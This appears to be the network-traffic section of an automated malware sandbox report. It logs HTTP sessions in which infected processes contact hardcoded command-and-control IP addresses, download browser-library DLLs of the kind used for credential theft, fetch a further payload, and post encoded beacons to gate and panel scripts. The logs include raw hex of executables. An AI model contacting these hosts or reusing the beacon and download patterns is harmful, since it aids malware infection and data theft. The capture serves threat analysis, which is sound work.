Dec 12, 2024 16:49:44.297818899 CET	248	IN	Data Raw: 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d e5 c1 e0 10 c1 e1 08 09 c1 0f b6 45 Data Ascii: uSPVEPo9]SUYY)ZYEME]M)19DEEE\|0)U\|2!!)]\|3)\|3!)}\|7
Dec 12, 2024 16:49:44.300488949 CET	1236	IN	Data Raw: 21 d7 b8 05 00 00 00 29 c8 c1 f8 1f f7 d0 8b 55 1c 80 7c 32 f2 01 19 db 09 c3 b8 06 00 00 00 29 c8 c1 f8 1f 80 7c 32 f1 01 f7 d0 19 d2 09 c2 21 da 21 fa b8 07 00 00 00 29 c8 c1 f8 1f f7 d0 8b 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10 Data Ascii: !)U\|2)\|2!!)M\|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjS
Dec 12, 2024 16:49:44.300539970 CET	1236	IN	Data Raw: 08 8b 55 18 8b 4d 14 8b 5d 0c 8b 75 08 8b 3e 8b 46 04 39 d8 74 3a 8d 4e 08 8b 56 08 c7 46 08 00 00 00 00 85 ff 89 4d ec 89 55 f0 74 48 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff d1 83 c4 08 68 0c 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff Data Ascii: UM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>
Dec 12, 2024 16:49:44.300549030 CET	248	IN	Data Raw: 00 00 8d bd f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 89 b5 ec fe ff ff 56 e8 cf f7 07 00 83 c4 0c bb 00 01 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 8b 75 0c 56 ff 75 08 57 e8 ac f7 07 00 83 c4 0c 01 f7 29 f3 39 f3 77 e8 53 ff 75 08 57 e8 Data Ascii: hh !Vf.@uVuW)9wSuWT>\>=t%>>fM1^_[]U}th
Dec 12, 2024 16:49:44.303679943 CET	1236	IN	Data Raw: 07 00 83 c4 08 5d c3 cc cc cc cc cc 55 89 e5 56 8b 75 1c 8b 45 14 39 f0 73 14 68 03 e0 ff ff e8 3b f6 07 00 83 c4 04 b8 ff ff ff ff eb 16 8b 55 0c 8b 4d 08 56 ff 75 18 50 ff 75 10 e8 0b 00 00 00 83 c4 10 5e 5d c3 cc cc cc cc cc 55 89 e5 53 57 56 Data Ascii: ]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}
Dec 12, 2024 16:49:44.303688049 CET	1236	IN	Data Raw: f2 17 66 0f 6f 2d e0 20 08 10 66 0f fe d5 f3 0f 5b d2 66 0f 70 e1 f5 66 0f f4 ca 66 0f 70 d2 f5 66 0f f4 d4 66 0f 6f e0 66 0f fe 25 00 21 08 10 66 0f 70 c9 e8 66 0f 70 d2 e8 66 0f 62 ca 66 0f 6e 54 07 04 66 0f 60 d3 66 0f 61 d3 66 0f eb cf 66 0f Data Ascii: fo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxEUMfEMUTFtFM
Dec 12, 2024 16:49:44.309039116 CET	248	IN	Data Raw: 4d cc 8b 45 e8 8b 55 ec 01 d0 83 c0 03 0f b6 c0 8b 55 f0 0f b6 14 02 00 d3 0f b6 f3 8b 7d f0 8a 34 37 8b 7d f0 88 34 07 8b 45 f0 88 14 30 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 10 09 c8 8b 4d e8 8b 55 ec 01 d1 83 c1 04 0f b6 c9 8b 55 f0 0f b6 Data Ascii: MEUU}47}4E0UMUU}47}4M1uU3UMEM}}Eu;uUM}Et}E
Dec 12, 2024 16:49:45.876698017 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 12, 2024 16:49:46.314449072 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:46 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 12, 2024 16:49:48.207926989 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 12, 2024 16:49:48.645143986 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:48 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 12, 2024 16:49:49.865596056 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 12, 2024 16:49:50.303821087 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:50 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 12, 2024 16:49:55.274522066 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 12, 2024 16:49:55.712528944 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:55 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 12, 2024 16:49:56.502244949 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 12, 2024 16:49:56.940278053 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:56 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.10	50085	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:40.104247093 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:40.224291086 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:41.777729988 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.10	50089	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:41.873130083 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:49:42.963052034 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.10	50091	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:42.003072023 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:42.123905897 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:43.486613989 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.10	50097	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:42.946506977 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:49:44.041645050 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 12 Dec 2024 10:09:25 GMT Age: 20418 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:49:44.305969000 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:49:44.621232033 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 12 Dec 2024 10:09:25 GMT Age: 20419 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.10	50104	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:43.766709089 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:43.896528959 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:45.388396025 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.10	50110	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:44.367058039 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.10	50117	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:44.792177916 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:49:45.879311085 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 10:08:28 GMT Age: 20477 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 12, 2024 16:49:45.986778975 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:49:46.301806927 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 10:08:28 GMT Age: 20478 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 12, 2024 16:49:56.410509109 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.10	50116	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:44.793207884 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:49:46.092911959 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.10	50118	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:44.886209011 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:49:45.972094059 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75227 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:49:56.097886086 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.10	50119	80.82.65.70	80	5584	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:45.575855970 CET	392	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: d Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:47.060123920 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:46 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="dll"; Content-Length: 242176 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo{ "}!{!}{#{op{,{ oo{!oo{*Bsu
